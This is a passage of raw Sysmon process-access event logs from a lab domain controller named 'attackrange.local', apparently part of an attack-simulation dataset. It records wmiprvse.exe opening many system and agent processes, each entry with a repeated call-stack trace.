Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204241Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.978{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-84A3-603E-A900-00000000AD01}4912C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204240Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.978{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204239Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.978{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-8444-603E-5B00-00000000AD01}3492C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204238Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.978{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-8444-603E-5800-00000000AD01}3304C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204237Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.978{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-8440-603E-3400-00000000AD01}2960C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204236Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.978{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-8440-603E-3300-00000000AD01}2668C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204235Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.978{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-843F-603E-3100-00000000AD01}2400C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204234Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.978{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-843F-603E-3000-00000000AD01}2464C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204233Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.978{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-843F-603E-2F00-00000000AD01}2420C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204232Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.978{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-843F-603E-2E00-00000000AD01}2300C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204231Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.978{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-843F-603E-2D00-00000000AD01}2308C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204230Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.978{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204229Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.978{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-843F-603E-2B00-00000000AD01}2540C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204228Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.978{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-843F-603E-2900-00000000AD01}1292C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204227Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.978{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-843F-603E-2700-00000000AD01}3004C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204226Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.978{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-8439-603E-2500-00000000AD01}2856C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204225Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.978{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-8430-603E-1800-00000000AD01}1928C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204224Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.978{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-842F-603E-1700-00000000AD01}1452C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204223Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.978{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-842F-603E-1600-00000000AD01}1340C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204222Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 